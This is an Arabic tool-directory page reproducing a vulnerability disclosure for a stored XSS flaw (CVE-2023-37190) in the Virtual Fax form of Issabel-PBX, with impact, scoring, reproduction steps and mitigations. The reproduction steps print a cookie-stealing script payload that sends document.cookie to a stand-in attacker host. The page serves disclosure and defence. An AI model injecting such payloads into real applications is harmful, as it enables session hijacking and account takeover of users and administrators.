Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-37190 — توجد ثغرة من نوع التخزين العملي للبرمجة النصية عبر المواقع (XSS) في Issabel-PBX الإصدار 4.0.0-6. يفشل التطبيق في تعقيم وترميز الإدخال المقدم من المستخدم بشكل صحيح قبل تخزينه في قاعدة البيانات ثم عرضه في الواجهة الإلكترونية. | Kitploit
أدوات/GitHubGitHub/sahiloj/cve-2023-37190
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبالأوراق والأبحاثالتعلم والتعليم
GitHubsahiloj/cve-2023-37190

CVE-2023-37190

توجد ثغرة من نوع التخزين العملي للبرمجة النصية عبر المواقع (XSS) في Issabel-PBX الإصدار 4.0.0-6. يفشل التطبيق في تعقيم وترميز الإدخال المقدم من المستخدم بشكل صحيح قبل تخزينه في قاعدة البيانات ثم عرضه في الواجهة الإلكترونية.

عرض المستودع
11منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-37190 — Issabel-PBX 4.0.0-6: تخزين البرمجة النصية عبر المواقع (Stored XSS)

CVE Severity Type Affected Version


📋 نظرة عامة

الحقلالتفاصيل
معرف CVECVE-2023-37190
نوع الثغرةتخزين البرمجة النصية عبر المواقع (Stored XSS)
المنتج المتأثرIssabel-PBX
الإصدار المتأثر4.0.0-6
الخطورةمتوسطة (CVSS v3.1 النتيجة: 5.4)
المكتشفSahil Ojha
تاريخ الإفصاح07 يوليو 2023
البائعIssabel
الكود المصدريIssabelFoundation/issabelPBX
تم الاختبار علىWindows

📝 الوصف

توجد ثغرة تخزين البرمجة النصية عبر المواقع (Stored XSS) في Issabel-PBX الإصدار 4.0.0-6. يفشل التطبيق في تعقيم وتشفير الإدخال المقدم من المستخدم بشكل صحيح قبل تخزينه في قاعدة البيانات ومن ثم عرضه في الواجهة الإلكترونية.

تظهر الثغرة في وحدة الفاكس الافتراضي (Virtual Fax)، وتحديداً في نموذج إنشاء "فاكس افتراضي جديد". معلمتان للإدخال — اسم الفاكس الافتراضي واسم معرف المتصل — لا تخضعان للتحقق الكافي من الإدخال أو ترميز المخرجات. وهذا يسمح لمهاجم مصادق بصلاحيات منخفضة بحقن وتخزين حمولة جافا سكريبت ضارة بشكل دائم داخل التطبيق.

بمجرد تخزينها، يتم تنفيذ البرنامج النصي الضار تلقائياً في متصفح أي مستخدم (بما في ذلك المسؤولين) يزور الصفحة المتأثرة، دون الحاجة إلى أي تفاعل إضافي من المهاجم.


⚠️ التأثير

المهاجم الذي يستغل هذه الثغرة بنجاح يمكنه:

  • سرقة ملفات تعريف الارتباط للجلسات واختطاف جلسات المستخدمين المصادقين، بما في ذلك حسابات المسؤولين.
  • تنفيذ إجراءات نيابة عن الضحايا، مثل تغيير الإعدادات أو إضافة مستخدمين أو تعديل إعدادات النظام.
  • توجيه المستخدمين إلى صفحات تصيد أو توزيع برمجيات خبيثة يسيطر عليها المهاجم.
  • تشويه واجهة التطبيق، مما يؤثر على تجربة المستخدم والثقة.
  • تسليم برمجيات خبيثة أو استغلالات للمتصفح لجميع المستخدمين الذين يصلون إلى الصفحة المتأثرة.
  • تنفيذ تسجيل ضغطات لوحة المفاتيح أو التقاط معلومات حساسة يتم إدخالها في الصفحة.

لأن الحمولة مخزنة (دائمة)، فإنها تؤثر على كل مستخدم يزور الصفحة الضعيفة حتى يتم إزالتها — مما يجعلها أكثر خطورة من XSS المنعكسة.


🔢 درجة CVSS v3.1


🔍 تفاصيل الثغرة

  • نوع الثغرة: تخزين البرمجة النصية عبر المواقع (CWE-79)
  • المكون المتأثر: وحدة الفاكس الافتراضي → نموذج فاكس افتراضي جديد
  • المعلمات الضعيفة:
    • اسم الفاكس الافتراضي
    • اسم معرف المتصل
  • المصادقة المطلوبة: نعم (مستخدم مصادق بصلاحيات منخفضة)
  • السبب الجذري: عدم تعقيم الإدخال وترميز المخرجات على المعلمات المتأثرة قبل التخزين والعرض في واجهة الويب.

🛠️ خطوات إعادة الإنتاج

المتطلبات الأساسية

  • مثيل قيد التشغيل من Issabel-PBX الإصدار 4.0.0-6.
  • بيانات اعتماد صالحة لحساب لديه صلاحية الوصول إلى وحدة الفاكس (مستخدم عادي أو مسؤول).

خطوات إعادة الإنتاج

الخطوة 1: سجل الدخول إلى تطبيق Issabel-PBX الإلكتروني باستخدام بيانات اعتماد صالحة.

الخطوة 2: انتقل إلى Fax → Virtual Fax → New Virtual Fax.

قم بحقن الحمولة التالية لـ XSS في حقل اسم الفاكس الافتراضي و/أو اسم معرف المتصل:

root@kitploit:~
<script>alert('XSS-CVE-2023-37190')</script>

للحصول على إثبات مفهوم أكثر تأثيراً يوضح سرقة ملفات تعريف الارتباط للجلسة (ملاحظة: في الهجمات الحقيقية، يُستخدم HTTPS لتجنب كشف ملفات تعريف الارتباط المسروقة أثناء النقل):

root@kitploit:~
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

يجب أن يبدو النموذج المملوء بالحمولة المحقونة مشابهاً للقطة الشاشة أدناه:

الخطوة 2 - حقن حمولة XSS في حقول اسم الفاكس الافتراضي واسم معرف المتصل

الخطوة 3: انقر على زر Save لتقديم النموذج. الآن تم تخزين الحمولة بشكل دائم في قاعدة بيانات التطبيق.

الخطوة 4: انتقل إلى صفحة قائمة الفاكس الافتراضي (أو اجعل مستخدمًا آخر — مثل المسؤول — يزور الصفحة). سيتم تنفيذ البرنامج النصي المخزن تلقائياً في متصفح الزائر، كما هو موضح أدناه:

الخطوة 4 - تنفيذ حمولة XSS المخزنة في المتصفح


🩹 التخفيف والمعالجة

يُنصح مستخدمي ومسؤولي Issabel-PBX بشدة بتطبيق الإجراءات التالية:

  1. التحقق من الإدخال: فرض التحقق الصارم من الإدخال من جانب الخادم على جميع المدخلات المقدمة من المستخدم. رفض أو تعقيم المدخلات التي تحتوي على أحرف HTML خاصة (<, >, ", ', &).
  2. ترميز المخرجات: تطبيق ترميز المخرجات حسب السياق (ترميز كيان HTML) عند عرض بيانات مقدمة من المستخدم في واجهة الويب لمنع تنفيذ البرامج النصية.
  3. سياسة أمان المحتوى (CSP): تنفيذ رأس HTTP Content-Security-Policy صارم لتحديد المصادر التي يُسمح بتنفيذ البرامج النصية منها، مما يقلل من تأثير ثغرات XSS.
  4. الترقية / التصحيح: مراقبة المستودع الرسمي لـ Issabel وتطبيق أي تصحيحات أمان يصدرها البائع.
  5. أقل الامتيازات: تقييد الوصول إلى الوحدات الحساسة مثل الفاكس الافتراضي للمستخدمين الذين يحتاجون إليها فقط، مما يحد من سطح الهجوم.

📚 المراجع

  • NVD - CVE-2023-37190
  • MITRE CVE Entry
  • Issabel Official Website
  • IssabelFoundation/issabelPBX على GitHub
  • CWE-79: تحييد غير صحيح للإدخال أثناء إنشاء صفحة الويب ('البرمجة النصية عبر المواقع')
  • OWASP: البرمجة النصية عبر المواقع (XSS)

👤 المؤلف

Sahil Ojha
باحث أمني
GitHub: @sahiloj


إخلاء مسؤولية: هذا المستودع لأغراض تعليمية والإفصاح المسؤول فقط. لا ينبغي استخدام المعلومات المقدمة هنا لمهاجمة الأنظمة دون إذن كتابي صريح من مالك النظام. المؤلف غير مسؤول عن أي إساءة استخدام لهذه المعلومات.

تنزيل الأداة
المقياسالقيمة
النتيجة الأساسية5.4 (متوسطة)
متجه الهجومشبكة
تعقيد الهجوممنخفض
الصلاحيات المطلوبةمنخفضة
تفاعل المستخدممطلوب
النطاقمتغير
السريةمنخفضة
النزاهةمنخفضة
التوفرلا شيء